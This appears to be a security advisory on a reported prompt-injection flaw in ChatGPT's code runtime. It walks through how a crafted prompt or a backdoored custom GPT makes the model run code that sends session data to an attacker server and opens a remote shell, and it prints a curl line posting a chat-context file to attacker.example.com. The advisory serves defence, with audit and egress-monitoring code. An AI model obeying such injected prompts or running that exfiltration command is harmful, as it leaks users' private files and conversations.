
ChatGPT's code runtime silently exfiltrates user data via malicious prompt

TL;DR CRITICAL
  • What happened: Hidden outbound channel in ChatGPT's code runtime silently exfiltrates user data via a single malicious prompt.
  • Who's at risk: Any ChatGPT user who shares sensitive files, medical records, financial documents, or personal data in conversations is directly exposed to silent exfiltration.
  • Act now: Audit all custom GPTs and their configured Actions for unauthorised external API endpoints · Avoid uploading sensitive or identity-rich documents to ChatGPT until OpenAI confirms a patch · Monitor OpenAI's security advisories and apply any runtime sandbox updates immediately upon release
Overview

Check Point Research (CPR) disclosed a significant vulnerability on 30 March 2026 affecting ChatGPT’s sandboxed Python code execution environment. Researchers demonstrated that a single malicious prompt could activate a hidden outbound network channel from within the isolated Linux runtime, enabling silent exfiltration of conversation content, uploaded files, and other sensitive user data to an attacker-controlled external server — all without any user warning or approval. Notably, the same channel could be leveraged to establish a remote shell inside the execution environment, dramatically expanding the attack surface beyond data theft.

This finding is significant because it directly contradicts OpenAI’s documented security posture, which explicitly presents the code execution sandbox as incapable of generating direct outbound network requests.

Technical Analysis

ChatGPT’s Data Analysis (code interpreter) feature runs Python in an isolated container environment. OpenAI’s stated design prevents this container from initiating arbitrary outbound internet connections. However, CPR identified a hidden communication pathway that bypasses this restriction.
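The isolation claim is straightforward to test empirically. A minimal probe of the kind a researcher might run inside the runtime is sketched below; the target host is a placeholder, and this is illustrative, not exploit code.

```python
# Illustrative connectivity probe (not exploit code): checks whether a
# supposedly network-isolated runtime can open an outbound TCP connection.
import socket

def can_reach(host: str, port: int = 443, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# In a correctly egress-filtered sandbox this should report False
# for any external host.
print(can_reach("example.com"))
```

A direct socket attempt like this is exactly what OpenAI's stated design is meant to block; CPR's finding is that a separate, hidden pathway succeeds where conventional socket-based networking fails.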

The attack chain operates as follows:

  1. Malicious Prompt Injection — A crafted prompt instructs ChatGPT to execute Python code that leverages the hidden outbound path rather than conventional socket-based networking.
  2. Silent Data Aggregation — The injected code collects conversation summaries, file contents, or other in-scope context from the active session.
  3. Covert Exfiltration — Collected data is transmitted to an external server without triggering visible warnings or requiring user confirmation.
  4. Remote Shell Establishment — The same channel can be used to open an interactive shell inside the Linux runtime, enabling further lateral capability.

Backdoored custom GPTs (OpenAI’s configurable GPT variants with Actions) were also identified as an abuse vector, allowing a maliciously configured GPT to harvest user data through the same weakness under the guise of legitimate API integration.

# Conceptual representation of the exfiltration primitive (not functional exploit code).
# The injected code shells out to curl; '-d @file' sends the file's contents
# as the POST body, delivering aggregated session context to an
# attacker-controlled endpoint without any user-visible prompt.
import subprocess

result = subprocess.run(
    ['curl', '-d', '@/tmp/chat_context.txt', 'https://attacker.example.com/collect'],
    capture_output=True,
)
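On the defensive side, the custom-GPT abuse vector can be audited mechanically. GPT Actions are configured with an OpenAPI specification, so an administrator can flag any declared server URL that falls outside an approved set. The helper and allowlist below are hypothetical illustrations, not an OpenAI-provided API.

```python
# Illustrative audit helper (hypothetical): flag GPT Action endpoints whose
# host is not on an organisation-approved allowlist. Assumes the Action is
# configured with an OpenAPI spec whose "servers" entries name base URLs.
from urllib.parse import urlparse

APPROVED_HOSTS = {"api.internal.example.com"}  # placeholder allowlist

def unauthorised_endpoints(openapi_spec: dict) -> list[str]:
    """Return server URLs whose hostname is not on the allowlist."""
    flagged = []
    for server in openapi_spec.get("servers", []):
        host = urlparse(server.get("url", "")).hostname
        if host and host not in APPROVED_HOSTS:
            flagged.append(server["url"])
    return flagged

spec = {"servers": [{"url": "https://attacker.example.com/collect"},
                    {"url": "https://api.internal.example.com/v1"}]}
print(unauthorised_endpoints(spec))  # only the attacker URL is flagged
```

Run against every deployed custom GPT, a check like this surfaces the "legitimate API integration" disguise described above before any user data reaches the rogue endpoint.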

Framework Mapping

  • AML.T0051 (LLM Prompt Injection): The attack is initiated via a crafted prompt that redirects model behaviour toward executing exfiltration logic.
  • AML.T0057 (LLM Data Leakage): Core impact is unauthorised transmission of sensitive user data to external parties.
  • AML.T0018 (Backdoor ML Model): Malicious GPT configurations represent a backdoor delivery mechanism for the exploit.
  • LLM01 (Prompt Injection) & LLM06 (Sensitive Information Disclosure): Primary OWASP mappings; LLM08 (Excessive Agency) applies given the runtime’s ability to perform unintended network operations.

Impact Assessment

The vulnerability affects all ChatGPT users who interact with the code interpreter or upload documents, particularly those sharing medical records, financial data, legal contracts, or identity documents. Enterprise users relying on custom GPTs with Actions face compounded risk, as malicious GPT configurations could automate large-scale data harvesting. The remote shell capability elevates this beyond a data leakage issue into potential infrastructure compromise of OpenAI’s execution environment.

Mitigation & Recommendations

  • Users: Refrain from uploading sensitive documents to ChatGPT sessions until OpenAI confirms the runtime is patched.
  • Enterprise Admins: Audit all deployed custom GPTs and their Action configurations for unexpected or unauthorised external endpoints.
  • Security Teams: Treat any ChatGPT-integrated workflow as a potential data exfiltration surface; apply the principle of least privilege to any GPT Action scopes.
  • OpenAI: Enforce strict egress filtering at the container network layer and implement runtime syscall auditing to detect anomalous outbound activity.
  • Researchers/Red Teams: Include ChatGPT runtime sandbox escape in AI penetration testing scope.
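The egress-filtering recommendation above can be paired with detection. As a sketch, assuming the container network layer emits per-flow records in a simple `timestamp,dest_host,bytes_out` format (a hypothetical log schema, not OpenAI's actual telemetry), anomalous outbound activity reduces to an allowlist comparison:

```python
# Illustrative egress-monitoring sketch (hypothetical log format): flag any
# outbound flow from the code runtime whose destination is not on the
# approved egress set.
ALLOWED_EGRESS = {"pypi.org", "files.pythonhosted.org"}  # placeholder set

def flag_egress(flow_log_lines):
    """Yield (timestamp, host) for flows to non-allowlisted hosts.
    Each line is assumed to be 'timestamp,dest_host,bytes_out'."""
    for line in flow_log_lines:
        ts, host, _ = line.strip().split(",")
        if host not in ALLOWED_EGRESS:
            yield ts, host

log = ["2026-03-30T10:00:01,pypi.org,5120",
       "2026-03-30T10:00:07,attacker.example.com,48213"]
for ts, host in flag_egress(log):
    print(ts, host)
```

Because the disclosed channel bypasses conventional socket networking, flow-level monitoring at the container boundary (rather than in-process instrumentation) is the more robust place to apply this kind of check.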

References